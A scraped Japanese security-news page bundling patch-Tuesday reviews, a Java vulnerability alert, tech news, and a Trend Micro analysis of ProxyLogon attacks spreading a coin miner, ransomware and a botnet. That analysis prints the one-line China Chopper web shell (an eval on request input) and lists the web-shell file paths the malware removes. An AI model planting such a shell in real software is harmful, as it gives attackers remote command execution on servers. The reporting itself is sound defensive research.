joan-gamell-XmZ4GDAp9G0-unsplash

Javaに認証なしで不正操作できる脆弱性 影響範囲広く「早急に修正プログラム適用を」

Javaに認証なしで不正操作できる脆弱性 影響範囲広く「早急に修正プログラム適用を」

Javaに認証なしで不正操作できる脆弱性 影響範囲広く「早急に修正プログラム適用を」

情報処理推進機構が、Javaの基本的な実行環境「Java SE」に重大な脆弱性があるとして注意喚起した。活用範囲が広く攻撃された場合の影響が大きいため、早急に修正プログラムを適用するよう呼び掛けている。 情報処理推進機構(IPA)は4月20日、プログラミング言語「Java」の基本的な実行環境「Java SE」に重大な脆弱(ぜ...

はてなブックマーク - Javaに認証なしで不正操作できる脆弱性 影響範囲広く「早急に修正プログラム適用を」 はてなブックマークに追加

joan-gamell-XmZ4GDAp9G0-unsplash

CodeCaptcha.io

CodeCaptcha.io

CodeCaptcha.io

CodeCaptcha.ioHide your web link behind a mini-coding challenge. What's CodeCaptcha?Sometimes you want to share a link (like job postings, google forms, your project, a secret sub-page etc) to programmers only. This service let's you do that while also preventing abuse and spam. How does it work?...

はてなブックマーク - CodeCaptcha.io はてなブックマークに追加

1180475318-0326113004

International PHP Conference Munich 2021

The International PHP Conference is the world's first PHP conference and stands since more than a decade for top-notch pragmatic expertise in PHP and web technologies. At the IPC, internationally renowned experts from the PHP industry meet up with PHP users and developers from large and small companies. Here is the place where concepts emerge and ideas are born - the IPC signifies knowledge transfer at highest level.

All delegates of the International PHP Conference have, in addition to PHP program, free access to the entire range of the International JavaScript Conference taking place at the same time.

Basic facts:

Date: Ocotber 25 ‒ 29, 2021

Location: Holiday Inn Munich City Centre, Munich or Online

Highlights:

  • 70+ best practice sessions
  • 50+ international top speakers
  • PHPower: Hands-on Power Workshops
  • Expo with exciting exhibitors on October 26 & 27
  • Conference Combo: Visit the International JavaScript Conference for free
  • All inclusive: Changing buffets, snacks & refreshing drinks
  • Official certificate for attendees
  • Free Swag: Developer bag, T-Shirt, magazines etc.
  • Exclusive networking events

For further information on the International PHP Conference Munich visit: www.phpconference.com/munich/

museums-victoria-QSBm03YHtrI-unsplash

How I Found A Vulnerability To Hack iCloud Accounts and How Apple Reacted To It – The Zero Hack

How I Found A Vulnerability To Hack iCloud Accounts and How Apple Reacted To It - The Zero Hack

How I Found A Vulnerability To Hack iCloud Accounts and How Apple Reacted To It - The Zero Hack

This article is about how I found a vulnerability on Apple forgot password endpoint that allowed me to takeover an iCloud account. The vulnerability is completely patched by Apple security team and it no longer works. Apple Security Team rewarded me $18,000 USD as a part of their bounty program b...

はてなブックマーク - How I Found A Vulnerability To Hack iCloud Accounts and How Apple Reacted To It - The Zero Hack はてなブックマークに追加

h-heyerlein-ndja2LJ4IcM-unsplash

Windows 11がオンラインにリーク

headless 曰く、

次世代Windowsとされる「Windows 11」がオンラインにリークしている(The Vergeの記事Windows Centralの記事[1][2]Baiduフォーラムの投稿)。

Windows 11は当初Baiduのフォーラムでスクリーンショットが共有され、その後ISOイメージも出回った。リークしたバージョンはWindows Insider ProgramのDevチャネルを示すバージョン「Dev」となっており、バージョン情報にははっきりと「Windows 11」と表示される。現在、DevチャネルのWindows 10 Insider Previewはビルド21390.2025なのに対し、リークしたWindows 11はビルド21996.1。ブランチはビルド21390.2025と同じCO_RELEASEとなっている。

Windows 11の外見は5月に計画中止が発表されたWindows 10Xと共通点が多く、センタリングされたタスクバーやスタートメニュー、再び角丸になったウィンドウが目立つ。スタートメニューはフローティング表示となり、ライブタイルは廃止された。「ニュースと関心事項」を置き換えるようにウィジェットが追加されている。

Microsoftは24日のデジタルイベントでWindows 11を発表するとみられている。The VergeやWindows Centralは今回のISOイメージが本物だと確認したとのことだ。

すべて読む | セキュリティセクション | アップグレード | OS | ソフトウェア | Windows | IT | 情報漏洩 | この記事をTwitterでつぶやく この記事をFacebookで共有 この記事をGoogle Plusで共有 このエントリーをはてなブックマークに追加

関連ストーリー:
次世代WindowsはやっぱりWindows 11? 2021年06月05日
Windows 10 バージョン21H1リリース、Windows 10Xの計画は中止に 2021年05月20日
Windowsのブランド名、今後もずっと「Windows 10」のままでいい?変える? 2021年05月19日

h-heyerlein-ndja2LJ4IcM-unsplash

2021年6月のセキュリティアップデートレビュー解説

今月の第2火曜日となった2021年6月8日、Adobe社およびMicrosoft社から更新プログラムがリリースされました。最新のセキュリティ更新プログラムの詳細について確認しましょう。

■Adobe社による2021年6月のセキュリティアップデート

今月Adobe社は、「Adobe Connect」、「Acrobat および Reader」、「Photoshop」、「Photoshop Elements」、「Experience Manager」、「Creative Cloud」、「Photoshop Elements」、「Experience Manager」、「Creative Cloud」、「RoboHelp」、「Premiere Elements」、「Animate」、「After Effects」に確認された39件の脆弱性に対処する10件のパッチをリリースしました。確認された脆弱性のうち9件はトレンドマイクロが運営する脆弱性発見・研究コミュニティ「Zero Day Initiative(ZDI)」による「ZDI program」を通して発見されたものです。中でも注目されるアップデートは、ReaderとAfter Effectsの脆弱性に対処するものです。「Critical(緊急)」に該当するReaderの脆弱性では、ユーザが特別に細工されたPDFファイルを対象となるバージョンのReaderで開いた場合、攻撃者によるコード実行が可能になります。ZDI programで発見されたもう一つのバグである解放済みメモリ使用(use-after-free、UAF)の脆弱性は、AcroForm(Acrobat で作成された従来のフォーム)のフィールドの処理に問題があります。この問題は、オブジェクトに対する操作を実行する前に、オブジェクトの存在が検証されていないことに起因します。After Effectsのアップデートでは、「Moderate (警告)」から「緊急」レベルまでの多数の脆弱性が修正されています。中でも最も深刻なものは、ログオンしているユーザのレベルでコードが実行される可能性がある脆弱性です。

Adobe社が今月対処した脆弱性はいずれも、リリース時点で一般に公開されている、あるいは悪用の事実を確認されている脆弱性として報告されているものはありません。

■Microsoft社による2021年6月のセキュリティ更新プログラム

6月Microsoft社は、「Microsoft Windows」、「.NET Core & Visual Studio」、「Microsoft Office」、「Microsoft Edge(ChromiumおよびEdgeHTML版)」、「SharePoint Server」、「Hyper-V」、「Visual Studio Code – Kubernetes Tools」、「Windows HTML Platform」、「Windows Remote Desktop」に存在する50件の脆弱性に対処するする修正プログラムをリリースしました。これらの脆弱性のうち、合計8件がZDI programを通じて発見されたものです。合計50件の脆弱性のうち、深刻度「Critical(緊急)」と評価されているものは5件、「Important(重要)と評価されているものが45件です。Microsoft社によると、これらの脆弱性のうち6件については現在悪用の事実が確認されており、3件についてはリリース時点で一般に公開済みと報告されています。

今月のアップデートのうち、興味深いものをいくつか見ていきましょう。まず、悪用の事実を確認済みと記載された脆弱性について、いくつか紹介します。

CVE-2021-33742 – Windows MSHTML プラットフォームのリモートコード実行の脆弱性

この脆弱性は、特別に細工されたWebコンテンツをユーザが閲覧した場合、攻撃者がターゲットのシステム上でコードを実行できる可能性があります。この脆弱性は、Trident (MSHTML) エンジン自体に存在するため、 Internet Explorer (IE)だけでなく、様々なアプリケーションに影響を与えます。この脆弱性を悪用する攻撃がどの程度広がっているのかは不明ですが、サポートされているすべてのWindowsのバージョンに影響を与えることを考えると、最優先で更新プログラムをテストし、適用すべきでしょう。

CVE-2021-31199CVE-2021-31201 – Microsoft Enhanced Cryptographic Provider の特権昇格の脆弱性

この2つの脆弱性は、先月「悪用の事実を確認済み」と報告されたAdobe Readerのコード実行が可能になる脆弱性「CVE-2021-28550」と関連しています。特権昇格とコード実行のバグがペアで利用されるのはよくあることで、今回の2つの脆弱性は一連の脆弱性攻撃の特権昇格に当たる部分と考えられます。実際に確認されている脆弱性攻撃に対処するために対応箇所が異なるパッチが遅れて提供されるのは少し珍しいことですが、これらの脆弱性が解消されたことは喜ばしいことです。

CVE-2021-31956 – Windows NTFS の特権昇格の脆弱性

この脆弱性も悪用の事実が確認されている脆弱性として報告されているものです。同じリサーチャーによって発見されたもう一つのバグ、情報漏えいの脆弱性「CVE-2021-31955」も、同様に悪用の事実を確認済みと記載されています。これらの脆弱性は、メモリリークを利用して権限昇格するために必要なアドレスを取得するというよく利用される手法であるため、組み合わせて用いられた可能性があります。単独で悪用された場合でも影響は大きいですが、組み合わせればさらに深刻化する可能性があります。優先度を上げてパッチのテストおよび適用を実行してください。

CVE-2021-31962 – Kerberos AppContainer のセキュリティ機能バイパスの脆弱性

攻撃者はこの脆弱性を悪用してKerberos 認証をバイパスし、任意のサービスプリンシパル名 (SPN)で認証する可能性があります。この脆弱性は、今月対処された脆弱性の中で最高のCVSSスコア9.4と評価されています。この脆弱性の悪用に成功すると、攻撃者は認証をバイパスし、SPN でアクセス可能な任意のサービスにアクセスできる可能性があります。SPN認証は、Kerberosのセキュリティにおいて極めて重要であることから、最優先で適用されるべきパッチです。

次に、その他に2021年6月のMicrosoft社による更新プログラムで修正された脆弱性について解説します。更新プログラムで対処している脆弱性の一覧はこちらから確認してください。

まず、先に紹介したもの以外で「緊急」に指定された脆弱性に注目してみます。この中ではDefenderのアップデートが目立ちますが、特に対処する必要はありません。Microsoft社は、マルウェア保護エンジン(Malware Protection Engine)を定期的に更新していますので、インターネットに接続されているシステムであればすでに更新が行われているはずです。念のためバージョンを確認し、もし必要であれば手動で更新プログラムを適用してください。同様に、VP9コーデックのアップデートについてもMicrosoft社を通じて自動的に更新されているはずです。こちらの場合も、もしインターネットに接続されていない環境であれば手動でパッチを適用する必要があります。「緊急」に分類された上記以外の脆弱性は、スクリプトエンジンにおけるメモリ破損の脆弱性と、SharePointのリモートコード実行の脆弱性です。SharePointの脆弱性は、ユーザの操作を必要としませんが、ある程度の権限が必要とされます。攻撃の複雑性は高いとはいえ、攻撃対象について考慮すると攻撃者はこの脆弱性を実際の攻撃に利用するためにあらゆる手段を講じると思われます。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-33742 Windows MSHTML Platform のリモートコード実行の脆弱性 緊急 7.5 はい はい RCE
CVE-2021-31985 Microsoft Defender のリモートコード実行の脆弱性 緊急 7.8 いいえ いいえ RCE
CVE-2021-31963 Microsoft SharePoint Server のリモートコード実行の脆弱性 緊急 7.1 いいえ いいえ RCE
CVE-2021-31959 Scripting Engine のメモリ破損の脆弱性 緊急 6.4 いいえ いいえ RCE
CVE-2021-31967 VP9 Video Extensions のリモートコード実行の脆弱性 緊急 7.8 いいえ いいえ RCE

表:「緊急」レベルに指定された脆弱性(2021年6月の更新プログラム)

次に「重要」レベルのアップデートに注目します。はじめに、「緊急」レベルだけでなく「重要」レベルにもSharePointのコード実行の脆弱性がいくつか含まれています。そのうちの1つはZDI programによって発見されたもので、近日中に詳細が公開される予定です。6月2日に同様の脆弱性について、ZDIブログで紹介されていますので、チェックしてみてください。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-31965 Microsoft SharePoint Server の情報漏えいの脆弱性 重要 5.7 いいえ いいえ Info
CVE-2021-26420 Microsoft SharePoint Server のリモートコード実行の脆弱性 重要 7.1 いいえ いいえ RCE
CVE-2021-31966 Microsoft SharePoint Server のリモートコード実行の脆弱性 重要 7.2 いいえ いいえ RCE
CVE-2021-31948 Microsoft SharePoint Server のなりすましの脆弱性 重要 7.6 いいえ いいえ Spoofing
CVE-2021-31950 Microsoft SharePoint Server のなりすましの脆弱性 重要 7.6 いいえ いいえ Spoofing
CVE-2021-31964 Microsoft SharePoint Server のなりすましの脆弱性 重要 7.6 いいえ いいえ Spoofing

表:「重要」レベルに指定された脆弱性(2021年6月の更新プログラム)

Officeコンポーネントに影響を与える脆弱性がいくつかありますが、最も注目すべきはOutlookのアップデートです。幸いなことに、プレビューウインドウ(ペイン)には影響がありません。攻撃者は、特別に細工されたファイルを該当するバージョンのOutlookで開くようにユーザを誘導する必要があります。デバイス管理にMicrosoft Intuneを使用している方は、できるだけ早くパッチを適用するようにしてください。攻撃のシナリオについては明らかにされていませんが、認証やユーザの操作を必要としないことは記載されています。Intuneを使用している場合は、このパッチを緊急として扱い、速やかに適用することをお勧めします。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-31939 Microsoft Excel のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-31980 Microsoft Intune Management Extension のリモートコード実行の脆弱性 重要 8.1 いいえ いいえ RCE
CVE-2021-31940 Microsoft Office Graphics のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-31941 Microsoft Office Graphics のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-31949 Microsoft Outlook のリモートコード実行の脆弱性 重要 6.7 いいえ いいえ RCE

表: Office製品に関連する脆弱性(2021年6月の更新プログラム)

「重要」レベルのコード実行に関する脆弱性は、3DビューアとPaint 3Dに対処するいくつかのパッチで締めくくられています。Paintの脆弱性の一つは、ZDIのリサーチャーMat Powellによって報告されたもので、STLファイルの解析に存在します。この問題は、ユーザの入力データの検証が適切に行われず、割り当てられたデータ構造体の境界を超えた書き込みが実行されてしまうことがあります。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-31944 3D Viewer の情報漏えいの脆弱性 重要 5 いいえ いいえ Info
CVE-2021-31942 3D Viewer のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-31943 3D Viewer のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-31945 Paint 3D のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-31946 Paint 3D のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-31983 Paint 3D のリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE

表: 3D ViewerとPaint3Dに関連する脆弱性(2021年6月の更新プログラム)

今月は上述のもの以外にも、以下の特権昇格(EoP)の脆弱性に対処するパッチが提供されています。また、Desktop Windows Manager(DWM)コアライブラリの特権昇格の脆弱性は、すでに一般に公開されており、悪用の事実を確認済みと記載されています。この脆弱性に対する攻撃がどの程度広まっているかは不明ですが、現時点では対象は絞られていると思われます。Chromium版Edgeのアップデートは、実際には6月4日(金)に公開されました。この脆弱性がコード実行ではなく特権昇格とされる理由は明らかではありませんが、いずれにしても、ユーザの操作が必要となります。今月対応された他の特権昇格の脆弱性は、攻撃者が権限を昇格させるために、対象システム上でコードを実行する必要があります。これらの脆弱性は、WindowsカーネルやMicrosoft社のKubernetesツールなど、複数のWindowsコンポーネントに影響を与えます。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-33739 Microsoft DWM Core Library の特権昇格の脆弱性 重要 8.4 はい はい EoP
CVE-2021-33741 Microsoft Edge (Chromium版) の特権昇格の脆弱性 重要 8.2 いいえ いいえ EoP
CVE-2021-31938 Microsoft VsCode Kubernetes Tools Extension の特権昇格の脆弱性 重要 7.3 いいえ いいえ EoP
CVE-2021-31969 Windows Cloud Files Mini Filter Driver の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-31954 Windows Common Log File System Driver の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-31953 Windows Filter Manager の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-31973 Windows GPSVC の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-31951 Windows Kernel の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-31952 Windows Kernel-Mode Driver の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-31958 Windows NTLM の特権昇格の脆弱性 重要 7.5 いいえ いいえ EoP
CVE-2021-1675 Windows Print Spooler の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP

表:特権昇格(EoP)の脆弱性(2021年6月の更新プログラム)

今月は他に、情報漏えいの脆弱性を修正するパッチが7件ありますが、Windowsカーネルの脆弱性について攻撃が活発化していると報告されています。ほとんどの場合、これらの脆弱性はすべて、不特定のメモリ内容の情報漏えいにつながるだけです。ただし、SharePointの情報漏えいについては、個人識別情報(PII)の漏えいにつながる可能性があります。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-31955 Windows Kernel の情報漏えいの脆弱性 重要 5.5 いいえ はい Info
CVE-2021-31944 3D Viewer の情報漏えいの脆弱性 重要 5 いいえ いいえ Info
CVE-2021-31972 Event Tracing for Windows の情報漏えいの脆弱性 重要 5.5 いいえ いいえ Info
CVE-2021-31965 Microsoft SharePoint Server の情報漏えいの脆弱性 重要 5.7 いいえ いいえ Info
CVE-2021-31975 Server for NFS の情報漏えいの脆弱性 重要 7.5 いいえ いいえ Info
CVE-2021-31976 Server for NFS の情報漏えいの脆弱性 重要 7.5 いいえ いいえ Info
CVE-2021-31960 Windows Bind Filter Driver の情報漏えいの脆弱性 重要 5.5 いいえ いいえ Info

表:情報漏えいの脆弱性(2021年6月の更新プログラム)

今回のリリースには、サービス妨害(DoS)の脆弱性を修正するパッチが5つ含まれています。最も影響を受けるのは、Hyper-VとWindows Defenderです。この場合も、Defenderのユーザはすでにアップデートを受け取っているはずです。なお、Defenderを無効にしている場合でも、影響を受けるファイルが存在する場合に、脆弱性スキャナによって検出される場合がありますが、Microsoft社によればDefenderを無効にしたシステムは 脆弱な状態 には該当しない、としています。また、Windowsリモートデスクトッププロトコルで修正されたサービス拒否(DoS)の脆弱性は、一般に公開されていると記載されていますが、どのような公開情報があるのかは明らかではありません。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-31968 Windows Remote Desktop Services のサービス拒否の脆弱性 重要 7.5 はい いいえ DoS
CVE-2021-31957 .NET Core and Visual Studio のサービス拒否の脆弱性 重要 5.9 いいえ いいえ DoS
CVE-2021-31978 Microsoft Defender のサービス拒否の脆弱性 重要 5.5 いいえ いいえ DoS
CVE-2021-31974 Server for NFS のサービス拒否の脆弱性 重要 7.5 いいえ いいえ DoS
CVE-2021-31977 Windows Hyper-V のサービス拒否の脆弱性 重要 8.6 いいえ いいえ DoS

表: サービス妨害(DoS)の脆弱性(2021年6月の更新プログラム)

今月のリリースでは、上述したKerberosのセキュリティ機能バイパスを含め、4つのセキュリティ機能のバイパスの脆弱性が修正されています。Windows DCOMのアップデートは特に注意が必要です。パッチによって脆弱性が自動的に修正されるのではなく、代わりに、企業にはこの脆弱性に対する強化(ハードニング)を有効にする機能が提供されます。Microsoft社は、2021年第4四半期にも更新プログラムのリリースを予定しており、その際にはデフォルトで保護機能を有効にする一方で、レジストリを介してハードニングを無効にすることが可能になります。2021年後半、もしくは2022年前半には、保護を無効にする機能は削除される予定です。これらの修正により、アプリケーションの互換性に問題が発生することが予想されますので、アップデートの際には十分にテストしてください。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-31962 Kerberos AppContainer のセキュリティ機能バイパスの脆弱性 重要 9.4 いいえ いいえ SFB
CVE-2021-26414 Windows DCOM Server のセキュリティ機能バイパス脆弱性 重要 4.8 いいえ いいえ SFB
CVE-2021-31971 Windows HTML Platform のセキュリティ機能バイパスの脆弱性 重要 6.8 いいえ いいえ SFB
CVE-2021-31970 Windows TCP/IP Driver のセキュリティ機能バイパスの脆弱性 重要 5.5 いいえ いいえ SFB

表: セキュリティ機能バイパス(SFB)の脆弱性(2021年6月の更新プログラム)

今月のリリースは、SharePoint Serverのなりすまし(Spoofing)の脆弱性に対処する3つのパッチで締めくくられています。通例通りServicing Stackに関するアドバイザリ(ADV990001)は、Windows 10およびServer 2019のすべてのバージョン用に改訂されました。その他、今月は新しいアドバイザリはリリースされませんでした。

CVE識別番号 脆弱性名称 深刻度 CVSS 一般公開 悪用確認 種類
CVE-2021-31948 Microsoft SharePoint Server のなりすましの脆弱性 重要 7.6 いいえ いいえ Spoofing
CVE-2021-31950 Microsoft SharePoint Server のなりすましの脆弱性 重要 7.6 いいえ いいえ Spoofing
CVE-2021-31964 Microsoft SharePoint Server のなりすましの脆弱性 重要 7.6 いいえ いいえ Spoofing

表: なりすまし(Spoofing)の脆弱性(2021年6月の更新プログラム)

参考記事:

翻訳: 室賀 美和(Core Technology Marketing, Trend Micro™ Research)

The post 2021年6月のセキュリティアップデートレビュー解説 first appeared on トレンドマイクロ セキュリティブログ.
h-heyerlein-ndja2LJ4IcM-unsplash

脆弱性「ProxyLogon」を悪用する攻撃:コインマイナー、ランサムウェア、ボットネットを新たに確認

2021年3月、Microsoftは中国のハッキンググループ「HAFNIUM」による大規模な攻撃にオンプレミス版のMicrosoft Exchange Serverの4つのゼロデイ脆弱性が利用されたことについてアドバイザリを発表し、修正プログラム(パッチ)の緊急公開を開始しました。この4つのゼロデイ脆弱性のうち、CVE-2021-26855に該当するSSRF(サーバーサイドリクエストフォージェリ)の脆弱性は、バグを発見したDEVCOREのリサーチャーによって「ProxyLogon」と名付けられました。

2020年10月にこの脆弱性が発見されて以来、該当のパッチ未適用のシステムを狙う攻撃が続いています。トレンドマイクロでは、ProxyLogonの脆弱性を利用する3つのマルウェアファミリを2021年3月から確認しています。「LemonDuck」と呼ばれるコインマイナーが最初に確認され、その後間もなくランサムウェア「BlackKingdom」、そしてボットネット「Prometei」が続きました(図1)。

図1:BlackKingdom、Prometei、LemonDuckの感染経路

攻撃者はProxyLogonの脆弱性を利用することによってWebシェル「China Chopper(以降Chopper)」※1を実行し、BlackKingdom、Prometei、LemonDuckそれぞれの最終的なペイロードを展開していました。2012年に初めて確認されたWebシェルChopperは、現在も標的システムのリモート操作を目的とする攻撃者に広く利用されています。最近ではランサムウェア「Hello」など多くのランサムウェアファミリでも利用されています。

※1:トレンドマイクロでは「Backdoor.JS.CHOPPER.SMYCBCD」および「Trojan.ASP.CVE202126855.SM」として検出します。

Chopperを利用してシステムに侵入すると、攻撃者は内部活動が可能になります。BlackKingdomおよびPrometeiの場合はバイナリファイルであるExchDefender.exeがドロップされ、LemonDuckの場合ではWMI modifierが使用されます。

■ランサムウェア「BlackKingdom」とボットネット「Prometei」

BlackKingdom※2とPrometei※3はどちらも「ExchDefender.exe」を利用してWindowsフォルダに自身をコピーします。そして、メインルーチンとしてMicrosoft Exchange用のセキュリティ対策ソフトを偽装するサービス「MSExchangeDefenderPL」を作成します(図2)。このサービスは、Windowsフォルダ内のバイナリファイルをコマンドライン「Dcomsvc」で実行します(図3)。

※2:トレンドマイクロでは「Ransom.Win64.BLACKKINGDOM」として検出します。
※3:トレンドマイクロでは「Backdoor.Win64.PROMETEI」、「TrojanSpy.Win32.PROMETEI」、「Coinminer.Win64.MALXMR」、「Coinminer.Win64.TOOLXMR」として検出します。

図2:MSExchangeDefenderPLをインストールするコードスニペット

図3:Dcomsvcコマンドのコードスニペット

MSExchangeDefenderPL は以下のフォルダに含まれるファイルの列挙を開始します。

C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

そして、このディレクトリ内で自身以外の攻撃者が設置したWebシェルに関連する以下のファイルを検索して削除し、自身のみがシステム内に存在するマルウェアとなります(図4)。

  • ExpiredPassword.aspx
  • frowny.aspx
  • logoff.aspx
  • logon.aspx
  • OutlookCN.aspx
  • RedirSuiteServiceProxy.aspx
  • signout.aspx
  • SvmFeedback.aspx

図4:MSExchangeDefenderPLが削除するファイル

この時点でBlackKingdomとPrometeiはどちらも、Offline Address Book(OAB)を改変するビルダーを使用して、ProxyLogonの脆弱性を利用しWebシェル Chopperをデプロイします。改変されたOABが起動されると、JavaScriptでASPX Webシェルがシステム上に作成されます(図5)。その後、仮想パスに接続してこのWebシェルを初期化します(図6)。

図5 :Webシェルを作成するJavaScriptのコード

図6:ASPX Webシェルを実行するコード

■コインマイナー「LemonDuck」

LemonDuck※4も同様にProxyLogonの脆弱性を利用してシステムを狙いますが、Windows Management Instrumentation(WMI)を利用してOABを改変します。そのようなWMIエントリの1つとして、Base64でエンコードされたコマンドを実行するPowerShellプロセスが確認されました(図7)。難読化を解除すると、このコマンドは特定のASPXファイルのExernalUrlパラメータを変更できることが判明しました(図8)。

※4:トレンドマイクロでは「Trojan.PS1.LEMONDUCK」として検出検出します。

図7:難読化解除したPowerShell

図 8: ASPXファイル内のExernalUrlパラメータが改変されている

こうしてASPXファイルが読み込まれると、リモートでコマンド実行することが可能になります。これは、Chopperが共通して利用する手法です。以下はWebシェルChopperを実行するコマンドです。

<script language=”JScript” runat=”server”>function Page_Load(){/*Exchange Service*/eval(Request[“unsafe”],”unsafe”);}</script>

Chopperは、バックドアコマンドを受信して実行することができるWebシェルです。今回紹介している例では、LemonDuckのペイロードがドロップされます。

トレンドマイクロの対策

Trend Micro XDR」は高度な分析と人工知能(AI)技術を使用して、エンドポイント、メール、ネットワークなどのアラートを相関させ、一つの防御ポイントの情報だけではわからないような脅威を可視化し、深刻度のレベルに応じて優先順位を付けます。これにより、企業は攻撃がどのように開始され、どの程度拡散しているかを迅速に把握でき、被害を最小化することができます。

■侵入の痕跡(Indicator of Compromise、IoC

今回の記事に関する侵入の痕跡はこちらを参照してください。

参考記事:

翻訳: 室賀 美和(Core Technology Marketing, Trend Micro™ Research)

The post 脆弱性「ProxyLogon」を悪用する攻撃:コインマイナー、ランサムウェア、ボットネットを新たに確認 first appeared on トレンドマイクロ セキュリティブログ.
h-heyerlein-ndja2LJ4IcM-unsplash

2021年5月のセキュリティアップデートレビュー解説

今月第2火曜日となった2021年5月11日には、Adobe社およびMicrosoft社から最新のセキュリティ更新プログラムがリリースされました。これらのセキュリティ更新プログラムの詳細について確認しましょう。

■Adobe社による2021年5月のセキュリティアップデート

今月Adobe社は、「Experience Manager」、「InDesign」、「Illustrator」、「InCopy」、「Adobe Genuine Service」、「Adobe Acrobat およびReader」、「Magento」、「Creative Cloud Desktop」、「Media Encoder」、「After Effects」、「Medium」、「Animate」に確認された44件の脆弱性に対処するための12のパッチをリリースしました。確認された脆弱性のうちの5つが、トレンドマイクロが運営する脆弱性発見・研究コミュニティ「Zero Day Initiative(ZDI)」による「ZDI program」を通して発見されたものです。

特に、AcrobatおよびReaderのアップデートは最優先で実施してください。このパッチで対処している14件の脆弱性のうちの1つ、「CVE-2021-28550」については実際の悪用を確認済みと報告されています。この脆弱性は、このパッチで修正される3件の解放済みメモリ使用(use After Free、UAF)の脆弱性のうちの1つです。これらの脆弱性により、特別に細工されたPDFをAcrobatまたはReaderで開いた場合、攻撃者によるコード実行が可能になります。また、InDesignのアップデートも注目に値します。今回のパッチで修正される脆弱性が悪用された場合、ユーザの入力データの検証が適切に行われず、割り当てられた構造体の境界を越えた書き込みが実行される可能性があります。攻撃者はこの脆弱性を利用し現在のプロセスのコンテキストでコードを実行することが可能になります。

なお、Adobe社のアップデートにより今月対処されたその他の脆弱性は、上述のCVE-2021-28550を除き、リリース時点で一般に公開されているものや悪用の事実を確認されているものはありません。

Microsoftによる2021月のセキュリティ更新プログラム

5月Microsoft社は、「Microsoft Windows」、「.NET Core & Visual Studio」、「Internet Explorer(IE)」、「Microsoft Office」、「SharePoint Server」、「Open Source Software」、「Hyper-V」、「Skype for Business and Microsoft Lync」、「Exchange Server」に含まれる55件の脆弱性に対処する修正プログラムをリリースしました。これらの脆弱性のうち、13件がZDI programを通じて確認されたものです。55件の脆弱性のうち4件が「Critical(緊急)」、50件が「Important(重要)」、1件が「Moderate (警告)」レベルの深刻度とされています。Microsoftによればこれらの脆弱性のうち3つは一般に公開されていますが、リリース時点で悪用の事実が確認されているものはありません。

それでは、まず今月のセキュリティ更新プログラムの中から特に注目すべき脆弱性を詳しく紹介します。

CVE-2021-31166 – HTTP プロトコルスタックのリモートコード実行の脆弱性

これは、権限を持たない攻撃者がリモートからカーネルモードでコードを実行できるようになる脆弱性です。攻撃者は特別に細工したパケットを、この脆弱性の影響を受けるサーバに送信するだけで攻撃が可能になります。そのためこの脆弱性はワーム化する可能性があり、Microsoft社もその点について言及しています。また、Windows 10はWebサーバとして設定することができるため同様の影響を受けます。このパッチの適用は最優先で実施してください。

CVE-2021-28476 – Hyper-V のリモートコード実行の脆弱性

共通脆弱性評価システム(CVSS )の基本スコアが9.9のこの脆弱性は、今月のアップデートの中で最も深刻度の高い評価となっていました。しかしMicrosoft社によれば、この脆弱性はコード実行ではなくバグチェックの形でサービス拒否(denial-of-service 、DoS)に利用される可能性のほうが高いと指摘しています。このため、攻撃の複雑性は高いと考えられ、現状スコアは8.5に変更されました。それでも深刻度は高いと言えますが、「緊急」ではありません。とはいえ、Hyper-Vを使用するユーザは、このパッチが適用されていることを確認するべきでしょう。

CVE-2021-27068 – Visual Studio のリモートコード実行の脆弱性

このパッチは、コード実行につながるVisual Studio 2019 の珍しい脆弱性を修正します。この脆弱性を悪用するにはユーザの操作を必要としないと記載されているため、どのように攻撃に利用されるのかは不明です。攻撃者はどこかの段階で認証を得る必要があるようですが、攻撃の複雑さは低いと記載されています。Visual Studio を使用する開発者は、この更新プログラムを入手してください。

CVE-2020-24587 – Windows ワイヤレスネットワークの情報漏えいの脆弱性

情報漏えいの脆弱性が注目されることは普段あまりありませんが、この脆弱性はかなりのダメージをもたらす可能性があります。これは、暗号化された無線パケットの内容の漏えいにつながる脆弱性です。攻撃範囲については明らかではありませんが、ある程度至近距離からの実行が必要だと考えるべきでしょう。なお、この脆弱性は2020年に確認されたものであり、Microsoft社がその修正にしばらく取り組んでいたことがうかがわれます。

次に、その他に2021年5月のMicrosoft社による更新プログラムで修正された脆弱性について解説します。更新プログラムで対処している脆弱性の一覧はこちらから確認してください。

